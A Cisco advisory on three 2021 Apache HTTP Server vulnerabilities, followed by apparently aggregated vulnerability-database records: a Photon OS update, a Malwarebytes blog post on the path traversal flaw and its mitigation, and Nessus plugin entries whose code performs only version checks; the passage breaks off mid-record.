On October 5, 2021 and October 7, 2021, the Apache Software Foundation released two security announcements for the Apache HTTP Server that disclosed the following vulnerabilities:
CVE-2021-41524: Null Pointer Dereference Vulnerability CVE-2021-41773: Path Traversal and Remote Code Execution Vulnerability CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)
For descriptions of these vulnerabilities, see the Apache Security Announcement ["https://httpd.apache.org/security/vulnerabilities_24.html"]. For additional information, see the Cisco TALOS blog post, Threat Advisory: Apache HTTP Server zero-day vulnerability opens door for attackers ["https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html"].
Cisco investigated its product line and concluded that no Cisco products are affected by these vulnerabilities.
{"photon": [{"lastseen": "2022-05-12T18:54:18", "description": "Updates of ['httpd'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-0118", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-19T00:00:00", "id": "PHSA-2021-0118", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-118", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-10-13T10:35:39", "description": "The Apache HTTP Server 2.4.49 is vulnerable to a flaw that allows attackers to use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. This issue is known to be exploited in the wild.\n\n### The vulnerability\n\nThe Apache HTTP Server Project started out as an effort to develop and maintain an open-source HTTP server for modern operating systems, including UNIX and Windows. It provides a secure, efficient, and extensible server that provides HTTP services in sync with the current HTTP standards.\n\nThe flaw (listed as [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>)) was introduced by a change made to path normalization in Apache HTTP Server 2.4.49. So, earlier versions are not vulnerable, nor are servers that are configured to "require all denied". \n\nUnfortunately, \u201crequire all denied\u201d is off in the default configuration. This is the setting that typically shows an error that looks like this:\n\n_ "Forbidden. You don't have permission to access {path}."_\n\n### Path traversal attack\n\nPath traversal attacks are done by sending requests to access backend or sensitive server directories that should be out of reach for unauthorized users. While normally these requests are blocked, the vulnerability allows an attacker to bypass the filters by using encoded characters (ASCII) for the URLs.\n\nUsing this method an attacker could gain access to files like cgi scripts that are active on the server, which could potentially reveal configuration details that could be used in further attacks.\n\n### Impact\n\nThe Apache HTTP Server Project was launched in 1995, and it's been the most popular web server on the Internet since April 1996. In August 2021 there were some 49 million active sites running on Apache server. Obviously we do not know which server every domain is using, but of the sites where we can identify the web server, Apache is used by 30.9%.\n\nA [Shodan search by Bleeping Computer](<https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/apache_number.jpg> \"\" ) showed that there are over a hundred thousand Apache HTTP Server 2.4.49 deployments online, many of which could be vulnerable to exploitation.\n\nSecurity researchers have warned that admins should patch immediately.\n\n> If you use Apache HTTP Server 2.4.49 (only that version), you should update to 2.4.50 now due to CVE-2021-41773, a nasty 0-day path traversal vulnerability <https://t.co/2QiV4h77B4>\n> \n> -- Mark J Cox (@iamamoose) [October 5, 2021](<https://twitter.com/iamamoose/status/1445304838963830784?ref_src=twsrc%5Etfw>)\n\n### Another vulnerability\n\nThere's a second vulnerability tackled by this patch\u2014[CVE-2021-41524](<https://nvd.nist.gov/vuln/detail/CVE-2021-41524>)\u2014a null pointer dereference detected during HTTP/2 request processing. This flaw allows an attacker to perform a denial of service (DoS) attack on the server. This requires a specially crafted request.\n\nThis flaw also only exists in Apache Server version 2.4.49, but is different to the first vulnerability in that, as far as we know, it is not under active exploitation. It was discovered three weeks ago, fixed late last month, and incorporated now in version 2.4.50.\n\n### Mitigation\n\nAll users should install the latest version as soon as possible, but:\n\n * Users that have not installed 2.4.49 yet should skip this version in their update cycle and go straight to 2.4.50.\n * Users that have 2.4.49 installed should configure \u201crequire all denied\u201d if they do not plan to patch quickly, since this blocks the attack that has been seen in the wild.\n\nA full list of vulnerabilities in Apache HTTP Server 2.4 can be found [here](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\n## Update, October 8 \n\nApache has issued a new patch. According to the release notes for version 2.4.51\u2026\n\n> \u2026the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nThe new part of the vulnerability is listed under [CVE-2021-42013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>). The "require all denied" setting blocks attacks using this vulnerability as well. Time to patch the patch.\n\nStay safe, everyone!\n\nThe post [[Updated, again] Apache fixes zero-day vulnerability in HTTP Server](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/apache-http/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-10-06T14:23:08", "type": "malwarebytes", "title": "[Updated, again] Apache fixes zero-day vulnerability in HTTP Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-06T14:23:08", "id": "MALWAREBYTES:916ADA06F0F0B2E4CCBAE56C7FEA87D1", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/apache-http/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:56:39", "description": "The Apache http server project reports :\n\n- moderate: NULL pointer dereference in h2 fuzzing (CVE-2021-41524)\n\n- important: Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T00:00:00", "type": "nessus", "title": "FreeBSD : Apache httpd -- Multiple vulnerabilities (25b78bdd-25b8-11ec-a341-d4c9ef517024)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_25B78BDD25B811ECA341D4C9EF517024.NASL", "href": "https://www.tenable.com/plugins/nessus/153894", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153894);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-41524\", \"CVE-2021-41773\");\n script_xref(name:\"IAVA\", value:\"2021-A-0451-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0046\");\n\n script_name(english:\"FreeBSD : Apache httpd -- Multiple vulnerabilities (25b78bdd-25b8-11ec-a341-d4c9ef517024)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Apache http server project reports :\n\n- moderate: NULL pointer dereference in h2 fuzzing (CVE-2021-41524)\n\n- important: Path traversal and file disclosure vulnerability in\nApache HTTP Server 2.4.49 (CVE-2021-41773)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n # https://vuxml.freebsd.org/freebsd/25b78bdd-25b8-11ec-a341-d4c9ef517024.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?86b69035\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41773\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24>=2.4.49<2.4.50\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:56:07", "description": "According to its banner, the version of Apache running on the remote host is 2.4.49. It is, therefore, affected by multiple vulnerabilities:\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. (CVE-2021-41773) Note that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.50 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113014", "href": "https://www.tenable.com/plugins/was/113014", "sourceData": "No source data", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:15", "description": "The version of Apache httpd installed on the remote host is 2.4.49. It is, therefore, affected by multiple vulnerabilities as referenced in the 2.4.50 advisory.\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. (CVE-2021-41773)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.50 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_50.NASL", "href": "https://www.tenable.com/plugins/nessus/153884", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153884);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-41524\", \"CVE-2021-41773\");\n script_xref(name:\"IAVA\", value:\"2021-A-0451-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0046\");\n\n script_name(english:\"Apache 2.4.49 < 2.4.50 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache httpd installed on the remote host is 2.4.49. It is, therefore, affected by multiple\nvulnerabilities as referenced in the 2.4.50 advisory.\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request\n processing, allowing an external source to DoS the server. This requires a specially crafted request. The\n vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could\n use a path traversal attack to map URLs to files outside the expected document root. If files outside of\n the document root are not protected by require all denied these requests can succeed. Additionally this\n flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in\n the wild. This issue only affects Apache 2.4.49 and not earlier versions. (CVE-2021-41773)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.50 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41773\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nvar constraints = [\n { 'min_version':'2.4.49', 'fixed_version' : '2.4.50' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:56:07", "description": "According to its banner, the version of Apache running on the remote host is 2.4.49 or 2.4.50. It is, therefore, affected by a path traversal vulnerability. The fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.51 Path Traversal", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113015", "href": "https://www.tenable.com/plugins/was/113015", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:57:22", "description": "The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies, Fernando Munoz from NULL Life CTF Team, and Shungo Kumasaka", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T00:00:00", "type": "nessus", "title": "FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-08-31T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_D001C189279311EC8FB1206A8A720317.NASL", "href": "https://www.tenable.com/plugins/nessus/153983", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153983);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\"CVE-2021-42013\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP\nServer 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n(CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server\n2.4.50 was insufficient. An attacker could use a path traversal attack\nto map URLs to files 